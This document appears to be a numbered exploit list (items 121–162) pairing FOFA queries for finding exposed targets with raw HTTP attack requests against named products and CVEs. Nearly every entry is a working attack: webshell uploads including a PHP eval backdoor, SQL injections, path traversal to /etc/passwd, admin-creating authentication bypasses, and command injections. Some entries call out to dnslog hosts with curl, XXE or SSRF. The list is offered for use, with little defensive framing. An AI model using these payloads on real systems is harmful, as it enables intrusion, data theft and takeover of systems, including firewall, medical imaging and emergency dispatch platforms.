File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin back-end URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 (Netentsec) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 (Netentsec) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

